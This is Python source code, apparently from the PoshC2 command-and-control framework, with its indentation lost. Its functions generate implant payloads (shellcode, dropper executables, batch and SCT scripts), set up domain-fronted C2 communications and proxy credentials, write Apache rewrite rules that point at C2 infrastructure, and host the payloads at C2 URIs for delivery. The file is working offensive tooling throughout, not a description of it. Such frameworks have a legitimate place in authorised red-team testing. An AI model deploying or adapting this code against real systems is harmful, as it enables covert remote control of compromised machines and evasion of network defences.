def do_createnewpayload(user, command, creds=None, shellcodeOnly=False):
params = re.compile("createnewpayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, user)
if creds is None:
return
if not creds['Password']:
print_bad("This command does not support credentials with hashes")
input("Press Enter to continue...")
clear()
return
name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ")
domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ")
pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ")
comms_url, PayloadCommsHostCount = string_to_array(comms_url)
domainfront, DomainFrontHeaderCount = string_to_array(domainfront)
if PayloadCommsHostCount == DomainFrontHeaderCount:
pass
else:
print("[-] Error - different number of host headers and URLs")
input("Press Enter to continue...")
clear()
proxyuser = ""
proxypass = ""
credsexpire = ""
if proxyurl:
if creds is not None:
proxyuser = "******" % (creds['Domain'], creds['Username'])
proxypass = creds['Password']
else:
proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ")
imurl = "%s?p" % get_newimplanturl()
else:
imurl = get_newimplanturl()
C2 = get_c2server_all()
urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret)
if shellcodeOnly:
newPayload.CreateDroppers("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
else:
newPayload.CreateAll("%s_" % name)
print_good("Created new payloads")
input("Press Enter to continue...")
clear()
def newdb(db):
print("Initializing new project folder and %s database" % db.value + Colours.GREEN)
print("")
directory = os.path.dirname(PoshProjectDirectory)
if not os.path.exists(directory):
os.makedirs(directory)
if not os.path.exists("%s/downloads" % directory):
os.makedirs("%s/downloads" % directory)
if not os.path.exists("%s/reports" % directory):
os.makedirs("%s/reports" % directory)
if not os.path.exists("%s/payloads" % directory):
os.makedirs("%s/payloads" % directory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
sys.exit(1)
setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, GET_404_Response, PoshProjectDirectory, QuickCommand, DownloadURI, "", "", "", URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, Slack_UserID, Slack_Channel, Slack_BotToken, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1", "# If running Apache 2.4.52 or Later", "Proxy100Continue Off"]
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
urlId = new_urldetails("default", C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId)
newPayload.CreateAll()
create_self_signed_cert(PoshProjectDirectory)
newPayload.WriteQuickstart(directory + '/quickstart.txt')
# adding default hosted payloads
QuickCommandURI = select_item("QuickCommand", "C2Server")
insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_py" % QuickCommandURI, "%saes.py" % (PayloadsDirectory), "text/html", "No", "Yes")
def existingdb(db):
print("Using existing %s database / project" % db.value + Colours.GREEN)
database_connect()
C2 = get_c2server_all()
if ((C2.PayloadCommsHost == PayloadCommsHost) and (C2.DomainFrontHeader == DomainFrontHeader)):
qstart = "%squickstart.txt" % (PoshProjectDirectory)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % PoshProjectDirectory):
import shutil
shutil.rmtree("%spayloads_old" % PoshProjectDirectory)
os.rename("%spayloads" % PoshProjectDirectory, "%spayloads_old" % PoshProjectDirectory)
os.makedirs("%spayloads" % PoshProjectDirectory)
update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
C2 = get_c2server_all()
urlId = new_urldetails(f"updated_host-{datetime.strftime(datetime.now(timezone.utc), '%Y-%m-%d-%H:%M:%S')}", PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId)
newPayload.CreateAll()
newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')
# adding default hosted payloads
QuickCommandURI = select_item("QuickCommand", "C2Server")
insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes")
insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
insert_hosted_file("%s_py" % QuickCommandURI, "%saes.py" % (PayloadsDirectory), "text/html", "No", "Yes")